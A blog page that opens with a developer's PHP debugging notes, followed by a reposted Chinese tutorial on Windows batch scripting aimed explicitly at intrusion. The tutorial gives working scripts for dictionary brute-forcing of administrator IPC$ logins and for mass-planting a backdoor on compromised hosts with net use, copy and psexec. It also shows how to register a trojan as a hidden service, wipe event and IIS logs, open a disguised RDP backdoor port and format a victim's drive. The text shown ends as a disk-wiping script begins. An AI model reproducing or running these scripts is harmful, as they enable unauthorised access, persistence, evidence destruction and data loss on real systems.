77\刚才看了看大师的作品。发觉他们用if也没啥特别，都是用if来判断某个变量的值，或者用fucntion来判断某个变量，或者数组的属性是否符合某个条件或者某种情况，然后，再执行某种操作。没什么特别。那么，俺一直搞不清这个if的判断用法，是不是俺自已搞晕啦。。。想得过于复杂啦？？
78、看来要尽快解决这个变量赋值与以及传值问题，否则，无法将编码继续下去！刚才，经过测试，不可以直接将$a=$b这样来传值。。刚才查了手册，可以考虑用引用赋值变量来代替！
79、if(!$imgsize=”" && !$get_imgname=”"){ 不可以这样写。应该这样写。if(!$imgsize && !$get_imgname){
80\ 如何将循环输出的变量输成一个字符串变量。那个while Function只是将目录下所有文件都找出来，并且一个一个地显示出来。。。俺在前台看到的输出效果是while不断起作用所至，而不是一个固定字符串变量！！
81、现在有两个问题，变量不能跨Function传递。。还有，就是无法将while 执行输出的每个值弄成一个字符串变量！
82\为什么手工指定文件名就可以下载，并跑完全程呢。。。没有指定就不行呢。俺想程序代码没有问题，语法也应没有问题。问题可能出在从数据库里取出的值方面。。。测试一下，看看，是不是这个问题。。。刚才测试过，好像不关这个图片名字多了个/符的事情。因为。俺直接编辑数据库表，将这个/符去掉，还是报同样的错误。。。可能问题还是在出在源代码方面。
83\为什么测试来测试去都无法显示那两个重要的变量，问题可能是根本就没有执行那Fucntion ，或者说根本没有产生那两个变量，所以，无法进入下一步操作。
84\到底问题出在哪里呢。为什么。改来改去，都是那样的报错呢？为什么无法将其它function产生的变量值无法在其它Function使用呢？？为什么，照理由俺已经将其它function以全局变量的形式来调用。。。那么其它function为何不起作用呢？难道是其它function没有将值传出来给其它Function调用？？
85\问题仍然一样，还是无法得到function的变量值。试过return都不行。。。。那如何取得Fucntion的变量值呢？
86\为何会文件丢失？难道电脑真的中了木马，给删除了一些资料？？
87\基本明白他们的营运方式，他们有一个叫什么博士的外贸系统，应该是叫金博士，其实这个外贸系统也可以叫做CRM系统，至少有这些CRM功能。他们的营运方式。就是他们在外国托管服务器，开设几个外贸网站，为了防止克隆。他们在网站加了功能过滤中国内的IP访问。这些网站其实就是基于ZENCART二次改造过的商城。而他们有自已的加工生产线。自产自销。将自已的生产的产品摆友商城。对外销售。如果客户想找其它在网城没有展示出来的商品。而且客户发来咨询电邮的话。那就主管，将咨询电邮发给相关跟单或者客服，让他们跟进。本公司没有的商品，就由相关跟单与客服跟进，联络其它商家，或者低买其它商家的产品，然后高价买给外国商家，并且从中盈利，相信，他们整体的盈运方式就是这样。。找天，找一个相熟的客服的咨询。了解，确实这个营运流程。还有。那些客服与跟单还要负责写一些商品英文说明材料与资料！
88\为什么不能执行那段检测文件大小类型的那段Fucntion呢？俺只是加了一些链接代码，就不行。那可能是那段代码执行不正确。所以。出错，报错，而影晌后面代码的执行！
89、根本无法集中注意力。无法集中精神盯着代码？为何这样。长时间盯着代码。眼睛很累。也看不入神。长时间盯着代码。可能会失明！变盲！
90、初步看过俺加的代码。思路是清晰的。流程是对的。逻辑也是对的。那为何会报错。那到底是那里问题？为什么加了这段代码，就提示不能执行检查文件大小类型参数？为什么？照理由俺的思路与想法都应没错。只要每天。没有图像文件。就到远程图片服务器拉回本地。然后再判断？？
91、俺就不信凭俺智慧不能解决这个问题！
92、相信自已，相信自已的智慧！·

dos批处理命令详解

admin — Fri, 08 May 2009 15:41:38 +0000

批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。

一.简单批处理内部命令简介

1.Echo 命令

打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。

语法:

echo [{on│off}] [message]
Sample：@echo off / echo hello world

在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命

令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令

表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使

用的命令啦。

Sample：@echo off
@echo Now initializing the program,please wait a minite…
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这

个参数给我们，效果和/y是一样的。)

3.Goto 命令

指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。

语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end

标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令

就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令

注释命令，在C语言中相当与/*——–*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你

自己日后修改。

Rem Message
Sample：@Rem Here is the description.

5.Pause 命令

运行 Pause 命令时，将显示下面的消息：
Press any key to continue . . .

Sample：
@echo off
:begin
copy a:*.* d：\back
echo Please put a new disk into driver A
pause
goto begin

在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入

驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。

6.Call 命令

从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签

。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。

语法:
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

参数:
[Drive:}[Path] FileName

指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令

调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
常用参数：
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数

执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE不等应用程序终止就返回命令提示。如果在命令脚本

内执行，该新行为则不会发生。

8.choice 命令

choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提

示可输入的字符，之间无空格。它的返回码为1234……

如: choice /c:dme defrag,mem,end

将显示
defrag,mem,end[D,M,E]?

Sample：
Sample.bat的内容如下:

@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行

标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后

都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。

9.If 命令

if 表示将判断是否符合规定的条件，从而决定执行不同的命令。

有三种格式:

1)、if “参数” == “字符串” 　待执行的命令
参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）

如if “%1″==”a” format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2)、if exist 文件名　待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。

如if exist config.sys edit config.sys

3)、if errorlevel / if not errorlevel 数字　待执行的命令
如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。

如if errorlevel 2 goto x2

DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。

10.for 命令

for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable

for {%variable│%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。

在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到支持:
FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

检查以 [drive:]path 为根的目录树，指向每个目录中的FOR 语句。如果在 /R 后没有指定目录，则使用

当前目录。如果集仅为一个单点(.)字符，则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-parameters]

该集表示以增量形式从开始到结束的一个数字序列。
因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN (“string”) DO command
FOR /F ["options"] %variable IN (‘command’) DO command

或者，如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN (“string”) DO command
FOR /F ["options"] %variable IN (‘command’) DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的下一个文件之前，每份文件都已被打开、读

取并经过处理。
处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字

符串变量值调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白

行。您可通过指定可选 “options” 参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同

解析选项的关键字。这些关键字为:

eol=c – 指一个行注释字符的结尾(就一个)
skip=n – 指在文件开始时忽略的行数。
delims=xxx – 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
tokens=x,y,m-n – 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号，那么额外的变量将在最后一

个符号解析之分配并接受行的保留文本。
usebackq – 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 file-set中使用双引号扩起

文件名称。

sample1:
FOR /F “eol=; tokens=2,3* delims=, ” %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for

程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用

%j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用

双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会

被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens=

一行指定最多 26 个符号，只要不试图说明一个高于字母 ‘z’ 或’Z’ 的变量。请记住，FOR 变量是单一字

母、分大小写和全局的；同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。

这样，该字符串会被当作一个文件中的一个单一输入行。

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符

串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此

，以下例子:

FOR /F “usebackq delims==” %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外，FOR 变量参照的替换已被增强。您现在可以使用下列选项语法:

~I – 删除任何引号(“)，扩充 %I
%~fI – 将 %I 扩充到一个完全合格的路径名
%~dI – 仅将 %I 扩充到一个驱动器号
%~pI – 仅将 %I 扩充到一个路径
%~nI – 仅将 %I 扩充到一个文件名
%~xI – 仅将 %I 扩充到一个文件扩展名
%~sI – 扩充的路径只含有短名
%~aI – 将 %I 扩充到文件的文件属性
%~tI – 将 %I 扩充到文件的日期/时间
%~zI – 将 %I 扩充到文件的大小
%~$PATH:I – 查找列在路径环境变量的目录，并将 %I 扩充到找到的第一个完全合格的名称。如果环境变

量未被定义，或者没有找到文件，此组合键会扩充空字符串

可以组合修饰符来得到多重结果:

%~dpI – 仅将 %I 扩充到一个驱动器号和路径
%~nxI – 仅将 %I 扩充到一个文件名和扩展名
%~fsI – 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i – 查找列在路径环境变量的目录，并将 %I 扩充到找到的第一个驱动器号和路径。
%~ftzaI – 将 %I 扩充到类似输出线路的 DIR

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法用一个有效的 FOR 变量名终止。选取类似

%I 的大写变量名比较易读，而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2：

利用For命令来实现对一台目标Win2k主机的暴力密码破解。

我们用net use \\ip\ipc$ “password” /u:”administrator”来尝试这和目标主机进行连接，当成功时记下

密码。
最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ “i%” /u:”administrator”
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给

find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ “i%%” /u:”administrator”│find “:命令成功完

成”>>D:\ok.txt ，这样就ko了。

sample3：

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会

变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵

，看下去你就会明白了。

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
@for /f “tokens=1,2,3 delims= ” %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数

%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码

（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容

是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。

代码雏形：
————— cut here then save as a batchfile(I call it main.bat ) ———————

——
@echo off
@if “%1″==”" goto usage
@for /f “tokens=1,2,3 delims= ” %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
————— cut here then save as a batchfile(I call it main.bat ) ———————

——

——————- cut here then save as a batchfile(I call it door.bat) ——————

———–
@net use \\%1\ipc$ %3 /u:”%2″
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3

>>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
—————– cut here then save as a batchfile(I call it door.bat) ——————–

————

这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一

目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功

能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

二.如何在批处理文件中使用参数

批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见

，我们就不考虑它了。

sample1：fomat.bat

@echo off
if “%1″==”a” format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添

足了～

sample2：

当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令

写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令

了。
@echo off
@net use \\1%\ipc$ “2%” /u:”3%” 注意哦，这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧？你这么帅一定学会了.No.3

三.如何使用组合命令(Compound Command)

1.&

Usage：第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令，而不管命令是否执行成功

Sample：
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif

2.&&
Usage：第一条命令 && 第二条命令 [&& 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则

一直执行完所有命令；

Sample：
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.

C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候可能会用到这种命令会比较简单，如：
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb

E:\backup
如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法

可以替换IF exist了.

3.││

Usage：第一条命令 ││ 第二条命令 [││ 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的

命令则一直执行完所有命令；

Sample：
C:\Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

组合命令使用的例子：

sample：
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3

>>victim.txt

四、管道命令的使用

1.│ 命令
Usage：第一条命令 │ 第二条命令 [│ 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。

sample：
time /t>>D:\IP.log
netstat -n -p tcp│find “:3389″>>D:\IP.log
start Explorer

看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登

录用户的IP。

2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于，>会清除调原有文件中的内

容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。

sample1：
echo hello world>c:\hello.txt (stupid example?)

sample2:
时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不

例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：
运行CMD–转换目录到system32–dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运

行:
CMD–fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比

较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,

然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没

有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到

回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。

3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用，也就不多做介绍。

五.如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删

除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统

的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操

作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作，常见的是创建、修改、删除。

1.创建
创建分为两种，一种是创建子项(Subkey)

我们创建一个文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为”hacker”的子

项。

另一种是创建一个项目名称

那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Invader”=”Ex4rch”
“Door”=C:\\WINNT\\system32\\door.exe
“Autodos”=dword:02

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是”String value”
door的类型是”REG SZ value”
Autodos的类型是”DWORD value”

2.修改
修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s

）即可。

3.删除
我们首先来说说删除一个项目名称，我们创建一个如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Ex4rch”=-

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的”Ex4rch”就

被删除了；

我们再看看删除一个子项，我们创建一个如下的脚本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了

。

相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了

，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

samlpe1:如上面的那个例子,如想生成如下注册表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Invader”=”Ex4rch”
“door”=hex:255
“Autodos”=dword:000000128

只需要这样：
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo “Invader”=”Ex4rch”>>Sample.reg
@echo “door”=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo “Autodos”=dword:02>>Sample.reg

samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、

Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查

杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为

windrv32.exe)

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo “windsnx “=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=

c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和

只读，并config为自启动]
@REM 这样不是更安全.

六.精彩实例放送。

1.删除win2k/xp系统默认共享的批处理
———————— cut here then save as .bat or .cmd file —————————

@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off

:Rem check parameters if null show usage.
if {%1}=={} goto :Usage

:Rem code start.
echo.
echo ——————————————————
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ——————————————————
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>

c:\delshare.reg
echo “AutoShareWks”=dword:00000000>> c:\delshare.reg
echo “AutoShareServer”=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END

:Usage
echo.
echo ——————————————————
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author：Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error：Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance，to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ，Please chang it youself.
echo.
echo example：
echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ：
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ——————————————————
goto :EOF

:END
echo.
echo ——————————————————
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ——————————————————
echo.

:EOF
echo end of the batch file
———————— cut here then save as .bat or .cmd file —————————

2.全面加固系统（给肉鸡打补丁）的批处理文件
———————— cut here then save as .bat or .cmd file —————————

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]

>>patch.dll

@echo “AutoShareServer”=dword:00000000 >>patch.dll
@echo “AutoShareWks”=dword:00000000 >>patch.dll
@REM [禁止共享]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo “restrictanonymous”=dword:00000001 >>patch.dll
@REM [禁止匿名登录]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo “SMBDeviceEnabled”=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll
@echo “Start”=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo “Start”=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo “ShutdownWithoutLogon”=”0″ >>patch.dll
@REM [禁止登录前关机]

@echo “DontDisplayLastUserName”=”1″ >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll

———————— cut here then save as .bat or .cmd file —————————

下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]

@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

Tcp] >>patch.dll
@echo “PortNumber”=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp

>>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
@echo “Start”=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
@echo “Start”=dword:00000002 >>patch.dll
@echo “ErrorControl”=dword:00000001 >>patch.dll
@echo “ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\

>>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\

>>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo “ObjectName”=”LocalSystem” >>patch.dll
@echo “Type”=dword:00000010 >>patch.dll
@echo “Description”=”Keep record of the program and windows’ message。” >>patch.dll
@echo “DisplayName”=”Microsoft EventLog” >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
@echo “Start”=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389连接，端口为8210(十六进制为00002012)，名称为Microsoft EventLog，留条后路]

3.Hard Drive Killer Pro Version 4.0（玩批处理到这个水平真的不容易了。）

———————— cut here then save as .bat or .cmd file —————————
@echo off
